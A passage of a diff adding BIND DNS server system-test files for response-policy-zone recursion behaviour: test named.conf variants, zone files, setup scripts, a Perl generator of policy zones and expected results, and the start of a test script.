* SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# common configuration +include "named.conf.header"; + +view "recursive" { + zone "." { + type hint; + file "root.hint"; + }; + + # policy configuration to be tested + response-policy { + zone "invalidprefixlength"; + }; + + # policy zones to be tested + zone "invalidprefixlength" { type master; file "db.invalidprefixlength"; }; +}; diff --git a/bin/tests/system/rpzrecurse/ns2/named.log.conf b/bin/tests/system/rpzrecurse/ns2/named.log.conf new file mode 100644 index 0000000..c3b4df6 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/named.log.conf @@ -0,0 +1,39 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# common configuration +include "named.conf.header"; + +view "recursive" { + zone "." { + type hint; + file "root.hint"; + }; + + # policy configuration to be tested + response-policy { + zone "log1" log no; + zone "log2" log yes; + zone "log3"; # missing log clause + } qname-wait-recurse no + nsdname-enable yes + nsip-enable yes; + + # policy zones to be tested + zone "log1" { type master; file "db.log1"; }; + zone "log2" { type master; file "db.log2"; }; + zone "log3" { type master; file "db.log3"; }; + + recursion yes; + dnssec-validation yes; +}; diff --git a/bin/tests/system/rpzrecurse/ns2/named.max.conf b/bin/tests/system/rpzrecurse/ns2/named.max.conf new file mode 100644 index 0000000..5b9f8a2 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/named.max.conf @@ -0,0 +1,161 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# common configuration +include "named.conf.header"; + +view "recursive" { + zone "." { + type hint; + file "root.hint"; + }; + + # policy configuration to be tested + response-policy { + zone "max1"; + zone "max2"; + zone "max3"; + zone "max4"; + zone "max5"; + zone "max6"; + zone "max7"; + zone "max8"; + zone "max9"; + zone "max10"; + zone "max11"; + zone "max12"; + zone "max13"; + zone "max14"; + zone "max15"; + zone "max16"; + zone "max17"; + zone "max18"; + zone "max19"; + zone "max20"; + zone "max21"; + zone "max22"; + zone "max23"; + zone "max24"; + zone "max25"; + zone "max26"; + zone "max27"; + zone "max28"; + zone "max29"; + zone "max30"; + zone "max31"; + zone "max32"; + zone "max33"; + zone "max34"; + zone "max35"; + zone "max36"; + zone "max37"; + zone "max38"; + zone "max39"; + zone "max40"; + zone "max41"; + zone "max42"; + zone "max43"; + zone "max44"; + zone "max45"; + zone "max46"; + zone "max47"; + zone "max48"; + zone "max49"; + zone "max50"; + zone "max51"; + zone "max52"; + zone "max53"; + zone "max54"; + zone "max55"; + zone "max56"; + zone "max57"; + zone "max58"; + zone "max59"; + zone "max60"; + zone "max61"; + zone "max62"; + zone "max63"; + zone "max64"; + } qname-wait-recurse no + nsdname-enable yes + nsip-enable yes; + + # policy zones to be tested + zone "max1" { type master; file "db.max1.local"; }; + zone "max2" { type master; file "db.max2.local"; }; + zone "max3" { type master; file "db.max3.local"; }; + zone "max4" { type master; file "db.max4.local"; }; + zone "max5" { type master; file "db.max5.local"; }; + zone "max6" { type master; file "db.max6.local"; }; + zone "max7" { type master; file "db.max7.local"; }; + zone "max8" { type master; file "db.max8.local"; }; + zone "max9" { type master; file "db.max9.local"; }; + zone "max10" { type master; file "db.max10.local"; }; + zone "max11" { type master; file "db.max11.local"; }; + zone "max12" { type master; file "db.max12.local"; }; + zone "max13" { type master; file "db.max13.local"; }; + zone "max14" { type master; file "db.max14.local"; }; + zone "max15" { type master; file "db.max15.local"; }; + zone "max16" { type master; file "db.max16.local"; }; + zone "max17" { type master; file "db.max17.local"; }; + zone "max18" { type master; file "db.max18.local"; }; + zone "max19" { type master; file "db.max19.local"; }; + zone "max20" { type master; file "db.max20.local"; }; + zone "max21" { type master; file "db.max21.local"; }; + zone "max22" { type master; file "db.max22.local"; }; + zone "max23" { type master; file "db.max23.local"; }; + zone "max24" { type master; file "db.max24.local"; }; + zone "max25" { type master; file "db.max25.local"; }; + zone "max26" { type master; file "db.max26.local"; }; + zone "max27" { type master; file "db.max27.local"; }; + zone "max28" { type master; file "db.max28.local"; }; + zone "max29" { type master; file "db.max29.local"; }; + zone "max30" { type master; file "db.max30.local"; }; + zone "max31" { type master; file "db.max31.local"; }; + zone "max32" { type master; file "db.max32.local"; }; + zone "max33" { type master; file "db.max33.local"; }; + zone "max34" { type master; file "db.max34.local"; }; + zone "max35" { type master; file "db.max35.local"; }; + zone "max36" { type master; file "db.max36.local"; }; + zone "max37" { type master; file "db.max37.local"; }; + zone "max38" { type master; file "db.max38.local"; }; + zone "max39" { type master; file "db.max39.local"; }; + zone "max40" { type master; file "db.max40.local"; }; + zone "max41" { type master; file "db.max41.local"; }; + zone "max42" { type master; file "db.max42.local"; }; + zone "max43" { type master; file "db.max43.local"; }; + zone "max44" { type master; file "db.max44.local"; }; + zone "max45" { type master; file "db.max45.local"; }; + zone "max46" { type master; file "db.max46.local"; }; + zone "max47" { type master; file "db.max47.local"; }; + zone "max48" { type master; file "db.max48.local"; }; + zone "max49" { type master; file "db.max49.local"; }; + zone "max50" { type master; file "db.max50.local"; }; + zone "max51" { type master; file "db.max51.local"; }; + zone "max52" { type master; file "db.max52.local"; }; + zone "max53" { type master; file "db.max53.local"; }; + zone "max54" { type master; file "db.max54.local"; }; + zone "max55" { type master; file "db.max55.local"; }; + zone "max56" { type master; file "db.max56.local"; }; + zone "max57" { type master; file "db.max57.local"; }; + zone "max58" { type master; file "db.max58.local"; }; + zone "max59" { type master; file "db.max59.local"; }; + zone "max60" { type master; file "db.max60.local"; }; + zone "max61" { type master; file "db.max61.local"; }; + zone "max62" { type master; file "db.max62.local"; }; + zone "max63" { type master; file "db.max63.local"; }; + zone "max64" { type master; file "db.max64.local"; }; + + recursion yes; + dnssec-validation yes; +}; diff --git a/bin/tests/system/rpzrecurse/ns2/named.wildcard1.conf b/bin/tests/system/rpzrecurse/ns2/named.wildcard1.conf new file mode 100644 index 0000000..f9e205d --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/named.wildcard1.conf @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# common configuration +include "named.conf.header"; + +view "recursive" { + zone "." { + type hint; + file "root.hint"; + }; + + # policy configuration to be tested + response-policy { + zone "wildcard1" policy NXDOMAIN; + } qname-wait-recurse yes + nsdname-enable yes + nsip-enable yes; + + # policy zones to be tested + zone "wildcard1" { type master; file "db.wildcard1"; }; + + recursion yes; + dnssec-validation yes; +}; diff --git a/bin/tests/system/rpzrecurse/ns2/named.wildcard2.conf b/bin/tests/system/rpzrecurse/ns2/named.wildcard2.conf new file mode 100644 index 0000000..31d05c6 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/named.wildcard2.conf @@ -0,0 +1,37 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# common configuration +include "named.conf.header"; + +view "recursive" { + zone "." { + type hint; + file "root.hint"; + }; + + # policy configuration to be tested + response-policy { + zone "wildcard2a" policy NXDOMAIN; + zone "wildcard2b" policy NXDOMAIN; + } qname-wait-recurse yes + nsdname-enable yes + nsip-enable yes; + + # policy zones to be tested + zone "wildcard2a" { type master; file "db.wildcard2a"; }; + zone "wildcard2b" { type master; file "db.wildcard2b"; }; + + recursion yes; + dnssec-validation yes; +}; diff --git a/bin/tests/system/rpzrecurse/ns2/named.wildcard3.conf b/bin/tests/system/rpzrecurse/ns2/named.wildcard3.conf new file mode 100644 index 0000000..7164d70 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/named.wildcard3.conf @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# common configuration +include "named.conf.header"; + +view "recursive" { + zone "." { + type hint; + file "root.hint"; + }; + + # policy configuration to be tested + response-policy { + zone "wildcard3" policy NXDOMAIN; + } qname-wait-recurse yes + nsdname-enable yes + nsip-enable yes; + + # policy zones to be tested + zone "wildcard3" { type master; file "db.wildcard3"; }; + + recursion yes; + dnssec-validation yes; +}; diff --git a/bin/tests/system/rpzrecurse/ns2/named.wildcard4.conf b/bin/tests/system/rpzrecurse/ns2/named.wildcard4.conf new file mode 100644 index 0000000..b6a76d0 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/named.wildcard4.conf @@ -0,0 +1,37 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# common configuration +include "named.conf.header"; + +view "recursive" { + # policy configuration to be tested + response-policy { + zone "passthru.zone" policy passthru; + zone "given.zone" policy given; + } qname-wait-recurse yes + nsdname-enable yes + nsip-enable yes; + + # policy zones to be tested + zone "passthru.zone" { type master; file "db.passthru"; }; + zone "given.zone" { type master; file "db.given"; }; + + zone "." { + type hint; + file "root.hint"; + }; + + recursion yes; + dnssec-validation yes; +}; diff --git a/bin/tests/system/rpzrecurse/ns2/root.hint b/bin/tests/system/rpzrecurse/ns2/root.hint new file mode 100644 index 0000000..ced47f3 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns2/root.hint @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 999999 +. IN NS ns.example. +ns.example. IN A 10.53.0.1 diff --git a/bin/tests/system/rpzrecurse/ns3/example.db b/bin/tests/system/rpzrecurse/ns3/example.db new file mode 100644 index 0000000..201a174 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns3/example.db @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 0 +@ SOA . . 0 0 0 0 0 +@ NS ns +ns A 10.53.0.3 +child NS ns.child +ns.child A 10.53.0.4 diff --git a/bin/tests/system/rpzrecurse/ns3/named1.conf.in b/bin/tests/system/rpzrecurse/ns3/named1.conf.in new file mode 100644 index 0000000..1a56066 --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns3/named1.conf.in @@ -0,0 +1,43 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + session-keyfile "session.key"; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + response-policy { zone "policy"; } + qname-wait-recurse yes + nsip-enable yes + nsdname-enable yes; + + include "../dnsrps.conf"; +}; + +zone "policy" { type master; file "policy.db"; }; + +zone "example.tld" { type master; file "example.db"; }; + +zone "." { type master; file "root.db"; }; diff --git a/bin/tests/system/rpzrecurse/ns3/named2.conf.in b/bin/tests/system/rpzrecurse/ns3/named2.conf.in new file mode 100644 index 0000000..b5370bf --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns3/named2.conf.in @@ -0,0 +1,42 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + response-policy { zone "policy"; } nsip-wait-recurse no + qname-wait-recurse yes + nsip-enable yes + nsdname-enable yes; + + include "../dnsrps.conf"; +}; + +zone "policy" { type master; file "policy.db"; }; + +zone "example.tld" { type master; file "example.db"; }; + +zone "." { type master; file "root.db"; }; diff --git a/bin/tests/system/rpzrecurse/ns3/policy.db b/bin/tests/system/rpzrecurse/ns3/policy.db new file mode 100644 index 0000000..526d75c --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns3/policy.db @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 0 +@ SOA . . 0 0 0 0 0 +@ NS . +32.100.0.53.10.rpz-nsip CNAME . diff --git a/bin/tests/system/rpzrecurse/ns3/root.db b/bin/tests/system/rpzrecurse/ns3/root.db new file mode 100644 index 0000000..665953d --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns3/root.db @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 0 +@ SOA . . 0 0 0 0 0 +@ NS ns +ns A 10.53.0.3 +foo NS foo.ns5 +ns5.foo A 10.53.0.5 diff --git a/bin/tests/system/rpzrecurse/ns4/child.example.db b/bin/tests/system/rpzrecurse/ns4/child.example.db new file mode 100644 index 0000000..47a90fb --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns4/child.example.db @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 0 +@ SOA . . 0 0 0 0 0 +@ NS ns +ns A 10.53.0.4 +foo NS ns.foo +foo NS ns.foo. +ns.foo A 10.53.0.5 diff --git a/bin/tests/system/rpzrecurse/ns4/named.conf.in b/bin/tests/system/rpzrecurse/ns4/named.conf.in new file mode 100644 index 0000000..372f5ad --- /dev/null +++ b/bin/tests/system/rpzrecurse/ns4/named.conf.in @@ -0,0 +1,38 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +controls { /* empty */ }; + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + session-keyfile "session.key"; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "child.example.tld" { type master; file "child.example.db"; }; diff --git a/bin/tests/system/rpzrecurse/prereq.sh b/bin/tests/system/rpzrecurse/prereq.sh new file mode 100644 index 0000000..b30cb41 --- /dev/null +++ b/bin/tests/system/rpzrecurse/prereq.sh @@ -0,0 +1,25 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if $PERL -e 'use Net::DNS;' 2>/dev/null +then + : +else + echo_i "This test requires the Net::DNS library." >&2 + exit 1 +fi + +exit 0 diff --git a/bin/tests/system/rpzrecurse/setup.sh b/bin/tests/system/rpzrecurse/setup.sh new file mode 100644 index 0000000..7c15414 --- /dev/null +++ b/bin/tests/system/rpzrecurse/setup.sh @@ -0,0 +1,89 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# touch dnsrps-off to not test with DNSRPS + +set -e + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +USAGE="$0: [-DNx]" +DEBUG= +while getopts "DNx" c; do + case $c in + x) set -x; DEBUG=-x;; + D) TEST_DNSRPS="-D";; + N) NOCLEAN=set;; + *) echo "$USAGE" 1>&2; exit 1;; + esac +done +shift `expr $OPTIND - 1 || true` +if test "$#" -ne 0; then + echo "$USAGE" 1>&2 + exit 1 +fi + +[ ${NOCLEAN:-unset} = unset ] && $SHELL clean.sh $DEBUG + +$PERL testgen.pl + +copy_setports ns1/named.conf.in ns1/named.conf + +copy_setports ns2/named.conf.header.in ns2/named.conf.header +copy_setports ns2/named.default.conf ns2/named.conf + +copy_setports ns3/named1.conf.in ns3/named.conf +copy_setports ns3/named2.conf.in ns3/named2.conf + +copy_setports ns4/named.conf.in ns4/named.conf + +# setup policy zones for a 64-zone test +i=1 +while test $i -le 64 +do + echo "\$TTL 60" > ns2/db.max$i.local + echo "@ IN SOA root.ns ns 1996072700 3600 1800 86400 60" >> ns2/db.max$i.local + echo " NS ns" >> ns2/db.max$i.local + echo "ns A 127.0.0.1" >> ns2/db.max$i.local + + j=1 + while test $j -le $i + do + echo "name$j A 10.53.0.$i" >> ns2/db.max$i.local + j=`expr $j + 1` + done + i=`expr $i + 1` +done + +# decide whether to test DNSRPS +$SHELL ../ckdnsrps.sh $TEST_DNSRPS $DEBUG +test -z "`grep 'dnsrps-enable yes' dnsrps.conf`" && TEST_DNSRPS= + +CWD=`pwd` +cat <<EOF >dnsrpzd.conf +PID-FILE $CWD/dnsrpzd.pid; + +include $CWD/dnsrpzd-license-cur.conf + +zone "policy" { type master; file "`pwd`/ns3/policy.db"; }; +EOF +sed -n -e 's/^ *//' -e "/zone.*.*master/s@file \"@&$CWD/ns2/@p" ns2/*.conf \ + >>dnsrpzd.conf + +# Run dnsrpzd to get the license and prime the static policy zones +if test -n "$TEST_DNSRPS"; then + DNSRPZD="`../rpz/dnsrps -p`" + "$DNSRPZD" -D./dnsrpzd.rpzf -S./dnsrpzd.sock -C./dnsrpzd.conf \ + -w 0 -dddd -L stdout >./dnsrpzd.run 2>&1 +fi diff --git a/bin/tests/system/rpzrecurse/testgen.pl b/bin/tests/system/rpzrecurse/testgen.pl new file mode 100755 index 0000000..399f343 --- /dev/null +++ b/bin/tests/system/rpzrecurse/testgen.pl @@ -0,0 +1,343 @@ +#!/usr/bin/env perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +use strict; +use warnings; + +my $boilerplate_header = <<'EOB'; +# common configuration +include "named.conf.header"; + +view "recursive" { + zone "." { + type hint; + file "root.hint"; + }; + + # policy configuration to be tested + response-policy { +EOB + +my $no_option = <<'EOB'; + } nsdname-enable yes nsip-enable yes; + + # policy zones to be tested +EOB + +my $qname_wait_recurse = <<'EOB'; + } nsdname-enable yes nsip-enable yes qname-wait-recurse no; + + # policy zones to be tested +EOB + +my $boilerplate_end = <<'EOB'; +}; +EOB + +my $policy_option = $qname_wait_recurse; + +my $serialnum = "1"; +my $policy_zone_header = <<'EOH'; +$TTL 60 +@ IN SOA root.ns ns SERIAL 3600 1800 86400 60 + NS ns +ns A 127.0.0.1 +EOH + +sub policy_client_ip { + return "32.1.0.0.127.rpz-client-ip CNAME .\n"; +} + +sub policy_qname { + my $query_nbr = shift; + return sprintf "q%02d.l2.l1.l0 CNAME .\n", $query_nbr; +} + +sub policy_ip { + return "32.255.255.255.255.rpz-ip CNAME .\n"; +} + +sub policy_nsdname { + return "ns.example.org.rpz-nsdname CNAME .\n"; +} + +sub policy_nsip { + return "32.255.255.255.255.rpz-ip CNAME .\n"; +} + +my %static_triggers = ( + 'client-ip' => \&policy_client_ip, + 'ip' => \&policy_ip, + 'nsdname' => \&policy_nsdname, + 'nsip' => \&policy_nsip, +); + +sub mkconf { + my $case_id = shift; + my $n_queries = shift; + + { # generate the query list + my $query_list_filename = "ns2/$case_id.queries"; + my $query_list_fh; + + open $query_list_fh, ">$query_list_filename" or die; + + for( my $i = 1; $i <= $n_queries; $i++ ) { + print $query_list_fh sprintf "q%02d.l2.l1.l0\n", $i; + } + } + + my @zones; + + { # generate the conf file + my $conf_filename = "ns2/named.$case_id.conf"; + + my $conf_fh; + + open $conf_fh, ">$conf_filename" or die; + + print $conf_fh $boilerplate_header; + + my $zone_seq = 0; + + @zones = map { + [ + sprintf( "$case_id.%02d.policy.local", $zone_seq++ ), + $_, + ]; + } @_; + + print $conf_fh map { qq{ zone "$_->[0]";\n} } @zones; + + print $conf_fh $policy_option; + + print $conf_fh map { qq{ zone "$_->[0]" { type master; file "db.$_->[0]"; };\n} } @zones; + + print $conf_fh $boilerplate_end; + } + + # generate the policy zone contents + foreach my $policy_zone_info( @zones ) { + my $policy_zone_name = $policy_zone_info->[0]; + my $policy_zone_contents = $policy_zone_info->[1]; + + my $policy_zone_filename = "ns2/db.$policy_zone_name"; + my $policy_zone_fh; + + open $policy_zone_fh, ">$policy_zone_filename" or die; + + my $header = $policy_zone_header; + $header =~ s/SERIAL/$serialnum/; + print $policy_zone_fh $header; + + foreach my $trigger( @$policy_zone_contents ) { + if( exists $static_triggers{$trigger} ) { + # matches a trigger type with a static value + print $policy_zone_fh $static_triggers{$trigger}->(); + } + else { + # a qname trigger, where what was specified is the query number it should match + print $policy_zone_fh policy_qname( $trigger ); + } + } + } +} + +mkconf( + '1a', + 1, + [ 'client-ip' ], +); + +mkconf( + '1b', + 2, + [ 1 ], +); + +mkconf( + '1c', + 1, + [ 'client-ip', 2 ], +); + +mkconf( + '2a', + 33, + map { [ $_ ]; } 1 .. 32 +); + +mkconf( + '3a', + 1, + [ 'ip' ], +); + +mkconf( + '3b', + 1, + [ 'nsdname' ], +); + +mkconf( + '3c', + 1, + [ 'nsip' ], +); + +mkconf( + '3d', + 2, + [ 'ip', 1 ] +); + +mkconf( + '3e', + 2, + [ 'nsdname', 1 ] +); + +mkconf( + '3f', + 2, + [ 'nsip', 1 ] +); + +{ + my $seq_code = 'aa'; + my $seq_nbr = 0; + + while( $seq_nbr < 32 ) { + + mkconf( + "4$seq_code", + 33, + ( map { [ $_ ]; } 1 .. $seq_nbr ), + [ 'ip', $seq_nbr + 2 ], + ( map { [ $_ + 2 ]; } ($seq_nbr + 1) .. 31 ), + ); + + $seq_code++; + $seq_nbr++; + } +} + +mkconf( + '5a', + 6, + [ 1 ], + [ 2, 'ip' ], + [ 4 ], + [ 5, 'ip' ], + [ 6 ], +); + +$policy_option = $no_option; + +mkconf( + '6a', + 0, + [ ], +); + +$serialnum = "2"; +mkconf( + '6b', + 0, + [ 'nsdname' ], +); + +$serialnum = "3"; +mkconf( + '6c', + 0, + [ ], +); + +__END__ + +0x01 - has client-ip + 32.1.0.0.127.rpz-client-ip CNAME . +0x02 - has qname + qX.l2.l1.l0 CNAME . +0x10 - has ip + 32.255.255.255.255.rpz-ip CNAME . +0x20 - has nsdname + ns.example.org.rpz-nsdname CNAME . +0x40 - has nsip + 32.255.255.255.255.rpz-nsip CNAME . + +$case.$seq.policy.local + +case 1a = 0x01 + .q01 = (00,0x01)=-r +case 1b = 0x02 + .q01 = (00,0x02)=-r + .q02 = (--,----)=+r +case 1c = 0x03 + .q01 = (00,0x01)=-r + +case 2a = 0x03{32} + .q01 = (00,0x02)=-r + .q02 = (01,0x02)=-r + ... + .q31 = (30,0x02)=-r + .q32 = (31,0x02)=-r + .q33 = (--,----)=+r + +case 3a = 0x10 + .q01 = (00,0x10)=+r +case 3b = 0x20 + .q01 = (00,0x20)=+r +case 3c = 0x40 + .q01 = (00,0x40)=+r +case 3d = 0x12 + .q01 = (00,0x10)=+r + .q02 = (00,0x02)=-r +case 3e = 0x22 + .q01 = (00,0x20)=+r + .q02 = (00,0x02)=-r +case 3f = 0x42 + .q01 = (00,0x40)=+r + .q02 = (00,0x02)=-r + +case 4aa = 0x12,0x02{31} + .q01 = (00,0x10)=+r + .q02 = (00,0x02)=-r + .q03 = (01,0x02)=+r + ... + .q32 = (30,0x02)=+r + .q33 = (31,0x02)=+r +case 4__ = 0x02{n(1->30)},0x12,0x02{31-n} + .q01 = (00,0x02)=-r + ... + .q(n+1) = (n,0x10)=+r + .q(n+2) = (n,0x02)=-r + ... + .q33 = (31,0x02)=+r +case 4bf = 0x02{31},0x12 + .q01 = (00,0x02)=-r + .q02 = (01,0x02)=-r + ... + .q31 = (30,0x02)=-r + .q32 = (31,0x10)=+r + .q33 = (31,0x02)=-r + +case 5a = 0x02,0x12,0x02,0x12,0x02 + .q01 = (00,0x02)=-r + .q02 = (01,0x02)=-r + .q03 = (01,0x10)=+r + .q04 = (02,0x02)=+r + .q05 = (03,0x02)=+r + .q06 = (04,0x02)=+r + diff --git a/bin/tests/system/rpzrecurse/tests.sh b/bin/tests/system/rpzrecurse/tests.sh new file mode 100644 index 0000000..950b610 --- /dev/null +++ b/bin/tests/system/rpzrecurse/tests.sh @@ -0,0 +1,545 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# touch dnsrps-off to not test with DNSRPS +# touch dnsrps-only to not test with classic RPZ + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 + +t=0 + +DEBUG= +ARGS= + +USAGE="$0: [-xS]" +while getopts "xS:" c; do + case $c in + x) set -x; DEBUG=-x; ARGS="$ARGS -x";; + S) SAVE_RESULTS=-S; ARGS="$ARGS -S";; + *) echo "$USAGE" 1>&2; exit 1;; + esac +done +shift `expr $OPTIND - 1 || true` +if test "$#" -ne 0; then + echo "$USAGE" 1>&2 + exit 1 +fi +# really quit on control-C +trap 'exit 1' 1 2 15 + +DNSRPSCMD=../rpz/dnsrps +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p 